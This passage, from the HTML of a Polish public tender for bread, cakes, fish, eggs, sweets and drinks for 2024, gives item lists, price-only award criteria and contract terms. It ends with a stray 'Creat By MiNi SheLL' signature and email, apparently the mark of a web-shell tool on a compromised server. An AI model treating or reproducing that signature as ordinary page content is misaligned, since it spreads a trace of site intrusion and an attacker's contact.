Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Nazwa artykułu Wymagana waga jednostkowa	Jm	Orientacyjna ilość zamówienia *<br/>1	Chleb pszenno-żytni krojony	900-1000g	kg	6 700,00<br/>2	Chleb razowy - krojony (pieczywo mieszane z przewagą mąki żytniej lub graham o grubym przemiale) bez sztucznych barwników	400 - 500g	kg	650,00<br/>3	Wek krojony (bułka pszenna długa, krojona)	300-500g	kg	125,00<br/>4	Bułka kajzerka	45g-60g	kg	460,00<br/>5	Bułka razowa / grahamka	50g-80g	kg	165,00<br/>6	Pieczywo mleczne (rogal, chałka)	65-100g	kg	80,00<br/>7	Bułka mleczna 50-80g	kg	80,00<br/>8	Bułka tarta	400-500g	kg	120,00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</p> <p class="mb-0">15820000-2 - Sucharki i herbatniki; wyroby piekarskie i ciastkarskie o przedłużonej trwałości</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Nazwa artykułu Wymagana waga jednostkowa	Jm	Orientacyjna ilość zamówienia *<br/>1	Drożdżówka - różne smaki (z budyniem, cynamonem, serem i owocami, serem i marmoladą, kokosem, itp.)	80-120g	kg	95,00<br/>2	Drożdżówka - różne smaki, z ograniczoną ilością cukru	80-120g	kg	36,00<br/>3	Jagodzianka	70-100g	kg	32,00<br/>4	Jagodzianka z ograniczoną ilością cukru	70-100g	kg	12,00<br/>5	Pączek z różnym nadzieniem (śmietaną, marmoladą, budyniem, kajmakiem, nugatem, itp.)	70-100g	kg	82,00<br/>6	Pączek z ograniczoną ilością cukru, bez polewy	70-100g	kg	29,00<br/>7	Biszkopt z kremem owocowym na bazie śmietany z dodatkiem musu owocowego kg	28,00<br/>8	Kruche ciasto - typu pleśniak - jasne i ciemne przekładane kwaśnym dżemem (np.: z czanej porzeczki) lub owocami i bezowym wierzchem kg	30,00<br/>9	Ciasto na kruchym spodzie pokryte galaretką, malinami i kremem serowym kg	35,00<br/>10	Rolada z bitą śmietaną – Rolada biszkoptowa z naturalną bitą śmietaną i nadzieniem (truskawki, galaretka itp.) kg	17,00<br/>11	Ciastko W-Z – Czekoladowy biszkopt pokryty cienką warstwą dżemu lub marmolady, przełożony naturalną bitą śmietaną z polewą czekoladową	80-100g	kg	18,00<br/>12	Ciasto typu tiramisu - biszkopt namoczony kawą, ze śmietaną i posypką z kako lub kawy kg	24,00<br/>13	Kołocz z serem i makiem na cieście drożdżowym kg	32,00<br/>14	Szarlotka - Ciasto z jabłek z cynamonem, na kruchym spodzie kg	65,00<br/>15	Sernik na biszkopcie czekoladowym kg	28,00<br/>16	Sernik z rosą – Ciasto na kruchym spodzie z masą serową pokryte bezową pianką kg	28,00<br/>17	Sernik na drożdżowym spodzie kg	30,00<br/>18	Ciasto drożdżowe z owocami (sezonowymi) kg	55,00<br/>19	Ciasto drożdżowe z kruszonką kg	20,00<br/>20	Piernik z bakaliami, przekładany marmoladą oblewany czekoladą kg	22,00<br/>21	Ptysie miniaturki nadziewane naturalną bitą śmietaną, budyniem itp.	do ok. 35g/szt. kg	4,00<br/>22	Kokosanki domowe - na maśle i białkach jaj z całymi wiórkami kokosowymi minimum 35% kg	6,00<br/>23	Pączki &#34;mini&#34; serowe	do ok. 30g/szt. kg	3,00<br/>24	Ciastka odpustowe - anyżki kg	3,00<br/>25	Ciastka odpustowe - makrony kg	6,00<br/>26	Ciastka odpustowe - kostki piernikowe w polewie lukrowej kg	12,00<br/>27	Faworki - chrusty śląskie (z ciasta śmietanowego, zbijanego) kg	3,00<br/>28	Baby piaskowe wielkanocne z bakaliami dekorowane (lukrowane, oblewane czekoladą, z posypką itp.) kg	30,00<br/>29	Ciasto kokosowe na biszkopcie z bitą śmiataną &#34; typu Raffaello&#34; kg	28,00<br/>30	Babeczki piaskowe - typu muffin	60-100g	kg	88,00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Nazwa artykułu	Wymagana gramatura opakowania Jm	Orientacyjna ilość zamówienia*<br/>1	Filety z zielonego śledzia	5000g-13000g	kg	55,00<br/>2	Filet z morszczuka, bez skóry, płaty SHP kg	65,00<br/>3	Filet z morszczuka kapskiego, bez skóry, płaty SHP	180-240g	kg	100,00<br/>4	Filet z miruny, bez skóry, płaty SHP kg	60,00<br/>5	Filety z dorsza, bez skóry, płaty SHP kg	180,00<br/>6	Filety z matiasa, bez skóry, solone (masa netto bez zalewy)	1000-4000g	kg	60,00<br/>7	Filety śledziowe w oleju z różnymi dodatkami (masa netto bez zalewy)	1000-3000g	kg	24,00<br/>8	Sałatka z filetów śledziowych w sosie śmietanowo-majonezowym - różne smaki (tatarski, koperkowy, z musztardą, itp.)	1000-3000g	kg	34,00<br/>9	Sałatka jarzynowa ze śledziami - zawartość ryby minimum 15%	100-900g	kg	5,00<br/>10	Sałatka jarzynowa ze śledziami - zawartość ryby minimum 15%	1000-3000g	kg	50,00<br/>11	Sałatka-krajanka z filetów śledziowych w oleju z różnymi dodatkami (masa netto bez zalewy) - różne smaki (z pomidorami, żurawiną, rodzynkami, salsa, itp.)	1000-3000g	kg	20,00<br/>12	Koreczki śledziowe z różnymi dodatkami (masa netto bez zalewy)	1000-3000g	kg	36,00<br/>13	Klopsy rybne opiekane w zalewie (masa netto bez zalewy)	100-2000g	kg	18,00<br/>14	Pasty rybne(z makreli, tuńczyka, łososia itp.) bez dodatku margaryny 50-500g	kg	8,00<br/>15	Pasty rybne(z makreli, tuńczyka, łososia itp.) bez dodatku margaryny 1000-4000g	kg	37,50<br/>16	Płaty śledziowe marynowane (masa netto bez zalewy)	1000-4000g	kg	18,00<br/>17	Makrela wędzona (tusze) kg	140,00<br/>18	Paprykarz #	100-400g	kg	60,00<br/>19	Szproty w oleju min 65% mięsa rybnego 150-200g	kg	20,00<br/>20	Tuńczyk w oleju - kawałki minimum 70% mięsa rybnego	150-200g	kg	16,00<br/>21	Śledzie w oleju o zawartości minumum 60% mięsa rybnego 150-200g	kg	15,00<br/>22	Śledzie w pomidorach o zawartości minimum 50% mięsa rybnego 150-200g	kg	50,00<br/>23	Ryba w galarecie minimum 30 % mięsa rybnego	150-200g	kg	72,00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15200000-0 - Ryby przetworzone i konserwowane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Nazwa artykułu &#34;Wymagana<br/>waga jajka&#34;	Jm	Orientacyjna ilość zamówienia *<br/>1	Jaja kurze 63g-73g (L)	szt. 14 000,00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Nazwa artykułu Wymagana gramatura opakowania	Jm	Orientacyjna ilość zamówienia *<br/>1	Biszkopty	120-3000g	kg	30,00<br/>2	Bombonierka -czekoladki nadziewane bezalkoholowe # 120-165g	kg	16,00<br/>3	Cukierki czekoladowe (nadzienie kakaowe, orzechowe, truflowe, na przydkład: michałki) # kg	4,00<br/>4	Ciastka maślane 500-2500g	kg	12,00<br/>5	Ciastka deserowe-kakaowe, z cukrem, z kokosem itp.	500-2500g	kg	18,00<br/>6	Ciastka deserowe oblewane czekoladą	500-2500g	kg	12,00<br/>7	Ciasteczka deserowe z nadzieniem owocowym, kremowym	500-2500g	kg	15,00<br/>8	Ciastka owsiane / wielozbożowe 250-2500g	kg	24,00<br/>9	Pierniki nadziewane w czekoladzie	500-2500g	kg	15,00<br/>10	Biszkopty z galaretką w czekoladzie	500-1000g	kg	15,00<br/>11	Galaretka w czekoladzie kg	3,00<br/>12	Praliny nadziewane (minimim 40% masy kakaowej) # kg	2,00<br/>13	Wafle bez dodatku cukru	70-120g	kg	9,50<br/>14	Ciastka bez dodatku cukru	70-150g	kg	12,00<br/>15	Zestaw wielkanocny z czekolady mlecznej (minimum 30% masy kakaowej) &#34;zajączek i jajeczka wielkanocne&#34;	80-100g	kg	18,00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15840000-8 - Kakao; czekolada i wyroby cukiernicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Nazwa artykułu Wymagana gramatura opakowania Jm	Orientacyjna ilość zamówienia <br/>1	Napoje owocowe pasteryzowane niegazowane minimum 20% soku 1000-2000ml	l	430,00<br/>2	Soczki owocowo-warzywne 100%, przecierowe 250-330ml	l	200,00<br/>3	Soki owocowo - warzywne 100%, przecierowe 750-1000ml	l	220,00<br/>4	Sok wysokosłodzony - naturalny zagęszczony z owoców czerwonych. Ekstrakt ogólny owoców minimum 60%	330-500ml	l	15,00<br/>5	Woda mineralna niegazowana/gazowana	1500ml	szt	18,00<br/>6	Soki owocowe 100% 1000ml	l	180,00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15980000-1 - Napoje bezalkoholowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta zostanie oceniona najwyżej, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania:<br/>oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2023r. poz. 852 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającym przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o zamówienie. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w rozdziale 7 p.1 SWZ, składa każdy z Wykonawców. Oświadczenie to tymczasowo zastępuje wymagane przez Zamawiającego podmiotowe środki dowodowe wskazane w SWZ.<br/>3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączą do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy. <br/>4)	Oświadczenie, o którym mowa w rozdziale 7 p.2 SWZ potwierdzające brak podstaw do wykluczenia z postępowania składa na wezwanie każdy z Wykonawców wspólnie ubiegających się o zmówienie. <br/>5)	Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana umowy może nastąpić w sytuacjach przewidzianych w art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych w następujących przypadkach:<br/>a)	urzędowej zmiany wysokości stawki podatku VAT poprzez wprowadzenie nowej stawki VAT dla towarów, których ta zmiana będzie dotyczyć, przy zachowaniu cen netto podanych w ofercie,<br/>b)	w sytuacji konieczności zaniechania wykonania dostaw, powodujące zmniejszenie przedmiotu umowy i wynagrodzenia o kwotę stanowiącą równowartość zaniechanych dostaw – w przypadku niemożliwości zrealizowania umowy w co najmniej 50 %.<br/>c)	Zamawiający dopuszcza wzrost cen jednostkowych netto jedynie w przypadku, gdyby na skutek szczególnych, niemożliwych do przewidzenia zmian cen rynkowych realizacja dostaw po cenach ofertowych groziła Wykonawcy rażącą stratą. Zamawiający może zawrzeć aneks do umowy uwzględniający wzrost cen jednostkowych netto oferowanych artykułów, gdy Wykonawca złoży pisemny wniosek, dokumentujący zaistnienie przesłanek uzasadniających zmianę umowy w tym zakresie. Dopuszczalny zakres zmian wartości umowy nie może przekroczyć 20%.<br/>2.	Zamawiający przewiduje także możliwość dokonania zmian postanowień zawartej umowy, zgodnie z art. 455 ust. 1 pkt 2 lit. b, pkt 4 oraz ust. 2 w przypadku:<br/>a)	wstąpienia przez następcę Wykonawcy w ogół praw i obowiązków, tzw. sukcesja uniwersalna,<br/>b)	konieczności modyfikacji umowy wynikający z okoliczności, których zamawiający - działając z należytą starannością nie mógł przewidzieć, jeżeli zmiana nie modyfikuje ogólnego charakteru umowy, a wartość zmiany nie przekracza 50 % wartości pierwotnej umowy,<br/>c)	modyfikacji umowy skutkujących nieznaczną zmianą wartości umowy (mniejszą od 10 % wartości pierwotnej umowy) i niepowodujących zmiany ogólnego charakteru umowy. <br/>3.	Wszelkie zmiany do ustaleń wynikających z niniejszej umowy, wymagają zachowania formy pisemnej pod rygorem nieważności takich zmian. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę przy użyciu Platformy e- Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-20 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com